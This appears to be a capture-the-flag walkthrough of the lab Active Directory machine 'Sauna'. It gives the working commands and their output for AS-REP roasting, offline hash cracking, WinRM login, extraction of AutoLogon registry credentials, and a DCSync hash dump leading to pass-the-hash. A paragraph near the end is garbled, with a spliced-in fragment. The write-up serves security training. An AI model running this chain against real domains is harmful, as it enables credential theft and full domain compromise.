Sauna is a deceptively rich Active Directory box. Despite its Easy rating, it walks you through three classic AD attack primitives — AS-REP Roasting, credential reuse via AutoLogon, and DCSync — making it one of the best beginner boxes for anyone preparing for OSCP, CRTP, or AD-heavy red team interviews.
Reconnaissance
We start with a full TCP scan to identify the service surface.
$ nmap -sC -sV -oA sauna 10.10.10.175
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP
445/tcp open microsoft-ds Windows Server 2016 Standard
The Kerberos (88), LDAP (389), and SMB (445) trio is the AD fingerprint. We capture the domain name from LDAP:
$ ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
Domain: EGOTISTICAL-BANK.LOCAL.
Enumeration
The HTTP root advertises an “About Us” page with a team roster — names we can transform into username candidates. A quick script generates the usual permutations: f.last, flast, first.last, firstl.
echo -e "Fergus Smith\nHugo Bear\nBowie Taylor\nSophie Driver\nShaun Coins\nSteven Kerb\nHale Bram" \
| awk '{print tolower($1"."$2"\n"substr($1,1,1) tolower($2)"\n"tolower($1) substr($2,1,1))}' \
> users.txt
AS-REP Roasting
With a user list and no credentials, AS-REP Roasting is the canonical first move. It exploits accounts with “Do not require Kerberos preauthentication” enabled — Kerberos hands the requester an AS-REP encrypted with the user’s hash, crackable offline.
$ GetNPUsers.py egotistical-bank.local/ -dc-ip 10.10.10.175 -usersfile users.txt -no-pass
[email protected]:a4fc...:0badb1...
Crack with hashcat mode 18200:
$ hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
$krb5asrep$23$fsmith@...:Thestrokes23
We now have fsmith:Thestrokes23.
Foothold
WinRM is the cleanest path on AD boxes — evil-winrm if fsmith is in Remote Management Users.
$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
*Evil-WinRM* PS C:\Users\FSmith\Documents> type ..\Desktop\user.txt
User flag captured.
Privilege Escalation — AutoLogon Credentials
winPEAS consistently surfaces AutoLogon entries in the registry, which store plaintext credentials.
PS> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmgr
DefaultPassword REG_SZ Moneymakestheworldgoround!
DCSync to Domain Admin
svc_loanmgr holds GetChangesAll rights — the exact set of permissions abused by DCSync to request password hashes for any principal, including krbtgt and the Administrator.
$ secretsdump.py EGOTISTICAL-BANK/svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175
Administrator:500:aad3b4...:823452073d75b9d1cf70...
Pass-the-Hash with psexec.py or wmiexec.py for the root flag.
1131f6ad-9c07-11d1-f79f-00c04fc2dcd2). Hunt for non-DC principals invoking replication and you’ll catch nearly every adversary using Mimikatz or Impacket.Key Takeaways
- AS-REP Roasting is free reconnaissance. Every AD assessment should attempt it against a generated user list before any credentials exist.
- AutoLogon registry keys are the #1 source of post-foothold creds on staff workstations and tier-1 admin jump hosts — every Windows checklist should include this query.
- DCSync rights are over-delegated in nearly every mature AD environment. BloodHound’s
MATCH p=()-[:GetChanges|GetChangesAll*1..]->(g:Group)query is the surest way to surface them.
